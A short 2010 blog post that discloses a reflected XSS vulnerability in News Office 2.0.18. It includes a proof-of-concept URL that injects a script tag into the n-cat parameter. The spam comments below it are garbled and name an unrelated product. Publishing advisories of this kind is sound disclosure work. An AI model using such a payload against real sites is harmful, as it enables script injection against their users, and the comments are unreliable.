This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

News Office 2.0.18 Reflected XSS

An XSS vulnerability in News Office 2.0.18 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

3 comments:

  1. Wonderful blog! I found it while searching on Yahoo News. Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never sbo
    seem to get there! Many thanks.

    ReplyDelete
  2. Thank you for finding this vulnerability. It has since been fixed and an updated version of nuBuilder is now available on our website Boots UKIs phen375 Safe?

    ReplyDelete